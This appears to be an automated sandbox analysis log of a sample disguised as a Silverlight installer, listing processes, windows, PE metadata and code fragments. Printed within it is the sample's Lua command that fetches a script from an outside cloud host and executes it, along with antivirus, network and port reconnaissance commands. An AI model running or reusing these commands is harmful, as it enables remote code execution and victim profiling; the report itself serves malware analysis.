Source: unknown	Process created: C:\Windows\Installer\MSIE4C1.tmp 'C:\Windows\Installer\MSIE4C1.tmp' flat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe c:\Windows\syswow64\MsiExec.exe -Embedding D8799928554D1158D35383D418369414
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\SLMSPRBootstrap.dll',SetupPlayReadyData
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName && WMIC os get caption && ipconfig /all
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe' mscorlib.dll
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\silverlight.configuration.exe' -enableMU
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C %ProgramData%\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC os get caption
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\lua\lua.exe C:\ProgramData\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'
Source: C:\ProgramData\lua\lua.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr LISTEN
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr 127.0.0.1:
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName && WMIC os get caption && ipconfig /all	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName && WMIC os get caption && ipconfig /all	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C %ProgramData%\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr LISTEN	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr 127.0.0.1:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Process created: C:\5a70dbc53fcf0baade86ff\install.exe c:\5a70dbc53fcf0baade86ff\install.exe	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe 'C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe' dhp=true dsp=true	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\SLMSPRBootstrap.dll',SetupPlayReadyData	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe' mscorlib.dll	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\silverlight.configuration.exe' -enableMU	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr LISTEN	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr 127.0.0.1:	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC os get caption	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC os get caption
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\lua\lua.exe C:\ProgramData\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'
Source: C:\ProgramData\lua\lua.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr 127.0.0.1:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr LISTEN
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr 127.0.0.1:

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\5a70dbc53fcf0baade86ff\install.exe	Automated click: Next >
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Automated click: Next >
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Automated click: Next >
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Automated click: Next >
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Automated click: Next >
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Automated click: Next >

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\5a70dbc53fcf0baade86ff\install.exe	Window detected: Install SilverlightBy clicking Install now you accept the Silverlight license agreement.EULA LEGAL LINKView the Silverlight License AgreementEULA PRIVACY TEXTSilverlight updates automatically.EULA PRIVACY LINKView the Silverlight Privacy StatementMake Bing my search engineMake MSN my homepage*Applies to Internet Explorer Firefox Chrome and SafariMicrosoft Service AgreementPrivacy PolicyInstall nowx
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Window detected: Install SilverlightBy clicking Install now you accept the Silverlight license agreement.EULA LEGAL LINKView the Silverlight License AgreementEULA PRIVACY TEXTSilverlight updates automatically.EULA PRIVACY LINKView the Silverlight Privacy StatementMake Bing my search engineMake MSN my homepage*Applies to Internet Explorer Firefox Chrome and SafariMicrosoft Service AgreementPrivacy PolicyInstall nowx

Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe

File opened: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\mscorrc.dll

Source: WhQZ6UbCEY.exe

Static PE information: certificate valid

Source: WhQZ6UbCEY.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: WhQZ6UbCEY.exe

Static file information: File size 2189056 > 1048576

Source: C:\ProgramData\lua\luac.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: WhQZ6UbCEY.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x110a00

Source: WhQZ6UbCEY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: WhQZ6UbCEY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: WhQZ6UbCEY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: WhQZ6UbCEY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: WhQZ6UbCEY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: WhQZ6UbCEY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: WhQZ6UbCEY.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source: WhQZ6UbCEY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\InstallWAVE2-7zip.pdb source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe
Source:	Binary string: C:\Personal\Temp\BingShareQID\Defaults\Applications\UniversalInstaller_Lite\Release\Microsoft_Defaults.pdb source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, microsoft_defaults.exe, 00000013.00000002.255409971.0000000000230000.00000002.00020000.sdmp
Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\Cleanup.pdbpT source: MSIE4C1.tmp, 00000018.00000000.267302140.0000000000C31000.00000020.00020000.sdmp
Source:	Binary string: sfxcab.pdb source: WhQZ6UbCEY.exe, 00000001.00000003.218859264.00000246AF9F6000.00000004.00000001.sdmp, Silverlight.exe
Source:	Binary string: coregen.pdb source: coregen.exe
Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\Silverlight.Configuration.pdb source: Silverlight.Configuration.exe
Source:	Binary string: D:\coding\lua\WinFeature.pdb source: lua.exe, 0000002C.00000003.339656452.000000000097D000.00000004.00000001.sdmp
Source:	Binary string: sfxcab.pdbU source: WhQZ6UbCEY.exe, 00000001.00000003.218859264.00000246AF9F6000.00000004.00000001.sdmp, Silverlight.exe, 00000006.00000002.404426464.0000000001002000.00000020.00020000.sdmp
Source:	Binary string: D:\coding\rust\armutil\bin\target\release\deps\Silverlight.pdb source: WhQZ6UbCEY.exe, 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp
Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\InstallWAVE2-7zip.pdb 2C source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp
Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\Cleanup.pdb source: MSIE4C1.tmp
Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\InstallWAVE2-7zip.pdb 2 source: install.exe, 0000000B.00000000.226207844.0000000001081000.00000020.00020000.sdmp
Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\Install.reswave2.pdb source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe

Source: WhQZ6UbCEY.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WhQZ6UbCEY.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WhQZ6UbCEY.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WhQZ6UbCEY.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WhQZ6UbCEY.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe

Unpacked PE file: 31.2.coregen.exe.2450000.1.unpack

Source: DefaultPack[1].EXE.19.dr

Static PE information: 0xB9387306 [Thu Jun 21 06:07:02 2068 UTC]

Source: C:\Users\user\AppData\Roaming\Silverlight.exe

Code function: 6_2_01002838 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

6_2_01002838

Source: DefaultPack.EXE.19.dr	Static PE information: real checksum: 0x30a214 should be: 0x30daf8
Source: luac.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x13ed4
Source: cli-32.exe.44.dr	Static PE information: real checksum: 0x0 should be: 0x1547d
Source: lua.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x7cc3
Source: cli-64.exe.44.dr	Static PE information: real checksum: 0x0 should be: 0x14914
Source: DefaultPack[1].EXE.19.dr	Static PE information: real checksum: 0x30a214 should be: 0x30daf8

Source: WhQZ6UbCEY.exe

Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF68901D push 01000001h; ret	1_2_00007FF7BF689024
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_004026AD push ecx; ret	3_2_004026C0
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_00994BE0 push eax; ret	3_2_00994C0E
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_00A24E1D push ecx; ret	3_2_00A24E30
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_01083037 push ss; ret	11_2_01083038
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_0109D715 push ecx; ret	11_2_0109D728
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_0109D7F5 push ecx; ret	11_2_0109D808
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_01082E7F push FFFFFFCAh; ret	11_2_01082E81
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_00225F15 push ecx; ret	19_2_00225F28
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C3544D push ecx; ret	24_2_00C35460
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C3CD93 push dword ptr [ebp-54h]; ret	24_2_00C3CD96
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C3CB91 push ecx; ret	24_2_00C3CB92
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C3CB9C push ecx; ret	24_2_00C3CB9E
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Code function: 31_2_0102B43D push ecx; ret	31_2_0102B437
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Code function: 31_2_01025445 push ecx; ret	31_2_01025458
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00D020C5 push es; iretd	36_2_00D020C6
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00D020F0 push es; iretd	36_2_00D020F6
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CD30A7 push ss; ret	36_2_00CD30A8
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CF2AB5 push ecx; ret	36_2_00CF2AC8
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00D02261 push esp; iretd	36_2_00D02262
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00D023E1 pushfd ; iretd	36_2_00D023E2
